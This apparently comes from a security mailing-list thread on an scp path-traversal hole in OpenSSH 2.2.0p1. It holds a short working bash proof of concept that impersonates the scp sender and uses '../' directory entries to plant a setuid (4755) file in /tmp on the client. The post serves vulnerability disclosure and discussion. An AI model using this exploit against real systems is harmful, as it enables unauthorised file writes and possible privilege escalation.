Re: openssh2.2.p1 - Re: scp file transfer hole

[Robert Bihlmeyer <robbe () ORCUS PRIV AT>]

Martin MaD Douda <martin () DOUDA NET> writes:

> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".

It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:

--
#!/bin/bash

echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--


> Since openssh 2.2.0p1 is latest existing version, this vulnerability
> probably exist in every single scp version in the world.

Data Fellows/SSH Communication Security's ssh 2 uses a different file
transfer protocol. So the above exploit won't work. That doesn't mean
that there are more sanity checks, though.

--
Robbe

Attachment: signature.ng
Description: